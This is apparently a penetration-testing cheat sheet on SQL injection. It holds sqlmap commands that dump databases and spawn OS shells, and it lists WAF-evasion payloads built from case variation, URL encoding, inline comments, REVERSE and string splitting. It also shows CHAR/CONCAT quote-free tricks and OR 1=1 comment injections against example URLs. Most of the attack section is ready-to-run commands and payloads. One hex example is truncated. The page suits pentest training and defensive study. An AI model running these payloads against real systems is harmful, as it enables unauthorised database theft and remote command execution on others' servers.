SQL Injection

Guides and Resources

Payload Cheatsheets

​SQLmap

SQL Injection tool that can spawn a meterpreter or VNC session back to attacker. Can return a decent number of false positives. Always verify. If you do not specify a value, SQLmap will attempt all by default

Config and help commands

Specify the database type if not SQL
1
--dbms=[db type]
Copied!
If you need to test and authenticated SQL injection, log into website via a browserand grab the cookie (pull from burp suite)
1
--data=[COOKIE]
Copied!
Help
1
# sqlmap --wizard
Copied!

Commands GET parameter - injection passed in the URL itself

Test if sql inject is valid (will return banner on success)
1
# sqlmap -u "http://domain.com?user=test&pass=test" -b
Copied!
Retrieve a database username
1
# sqlmap -u "http://domain.com?user=test&pass=test" --current-user
Copied!
Crawl target
1
sqlmap -u http://10.10.10.10 --crawl=1
Copied!
Dump Database
1
sqlmap -u http://10.10.10.10 --dbms=mysql --dump
Copied!
Spawn interactive shell
1
# sqlmap -u "http://domain.com?user=test&pass=test" --os-shell
Copied!
WAF bypass and shell setup
1
# sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id" --dbms=mysql --os-shell
Copied!

Commands POST parameter - injection passed in the data section

Test if sql inject is valid (will return banner on success)
1
# sqlmap -u β€œhttp://domain.com” --data="user=test&pass=test" -b
Copied!

SQLmap with Burp

  • Start SQLmap API on your kali box while Burp Proxy Pro can be runnign anywhere
  • When Burp finds an SQL injection, it will connect to SQLmap's running API to automaticallu attack the vulnerable parameters.
  • Start SQLmap API
    • # cd /opt/sqlmap
    • # python sqlmapapi.py -s [ip] -p [port]

Other Tools

SQL Basics

Techniques

Filter evasion

  • Many applications use web application firewalls (WAF) to help protect against any kind of SQL injection vulnerability. The only problem is that WAFs only look for certain words, characters, or patterns, meaning certain special characters used in combination can be used to evade WAF filter protection.
  • For example, a very basic WAF may filter out specific SQL keywords such as OR, SELECT, UNION or WHERE to prevent them from being used in SQL injection attacks.
  • Methods
    • Capitalization - If the WAF's filter, like the one described above, is implemented poorly, then there may be ways to evade it by using variations of the word being filtered out. The most straightforward example is where we can bypass the filter by capitalizing some letters in the keyword, like this:
      • Or, SeLeCt, UNioN and wHEre.
    • URL Encoding - In cases where the query forms part of a URL, URL encoding may be a viable option for evading the filter. For example %55 is β€˜U’ and %53 is β€˜S’. The WAF may not identify these encoded characters, and may send them to the server which decodes and processes them as the intended keywords.
    • Multi-line Comments - the use of multi-line comments, such as β€œ/*” and β€œ*/”, may cause the WAF filter to miss the keywords. MySQL will read the content between the two comment lines and execute it as SQL, whereas the DBMS may not flag it up.
      • /*!%55NiOn*/ /*!%53eLEct*//**//*!12345UNION SELECT*//**//**//*!50000UNION SELECT*//**//**/UNION/**//*!50000SELECT*//**/
      • The β€˜+’ can be used to build an injection query without the use of quotes. +union+distinct+select++union+distinctROW+select+
    • Inline Comments - To bypass certain filters, you can abuse the inline comment system within MySQL using #.
      • +#uNiOn+#sEleCt
    • Reverse Function - To bypass a filter looking for certain strings, you can use the REVERSE function which will evaluate the correct way around at run time. However, when going through the filter, it will be seen as β€˜noinu’ instead of β€˜union’.
      • REVERSE('noinu')+REVERSE('tceles')
    • String Splitting - You can split strings within the query to bypass various filters. MySQL will still execute them as keywords.
      • un?+un/**/ion+se/**/lect+

String Concatenation

​
An input field may restrict the usage of certain datatypes and/or words/punctuation. This can make the exploitation of SQL injection vulnerabilities a little bit more difficult. However, two functions can be used in conjunction to bypass filters such as these:CHAR() and CONCAT().

Syntax & examples

  • Within MySQL, you have to use quotation marks to input a string into a statement. However, with the use of string functions and encoding methods, you can get past this hurdle.
  • To concatenate various strings inside a statement, the MySQL function CONCAT is available.
    • CONCAT(str1, str2, str3)
    • SELECT CONCAT(login, email) FROM users
  • Another way to create strings without the use of quotes is the MySQL's CHAR function, which returns a character related to the integer passed to it. For example, CHAR(75) returns K. CHAR and CONCAT are often used together to create full sets of strings which bypass specific string filtering. This means you don't need quotation marks in the query.
    • SELECT CONCAT(CHAR(77),CHAR(76),CHAR(75))
    • This will select data from a database that is of β€˜MLK’.
  • Encoding methods are another way to manipulate strings. Strings can be encoded into their Hex values either by passing a hex value or using the HEX() function.
  • For example, the string 'password' can be passed to an SQL statement like this: SELECT 0x70617373776f726

Retrieve Hidden Data

  • When retrieving items from a database via an SQL query, some results may be filtered with a restriction clause at the end of the of the query
  • In a vulnerable parameter, we can insert β€˜--’ which is the SQL code for a comment. This will β€œcomment out” the rest of the query, there for removing any restrictions placed on it.
  • Example:
    • https://insecure-website.com/products?category=Gifts
    • Query made by this URL:SELECT * FROM products WHERE category = 'Gifts' AND released = 1
    • URL with added comment attack: https://insecure-website.com/products?category=Gifts'--
      • Resulted query:SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
    • Expanding URL to show everything
      • https://insecure-website.com/products?category=Gifts'+OR+1=1--
      • Resulted query: SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

Subvert App Logic/Login Bypass

Manual Injection Methodology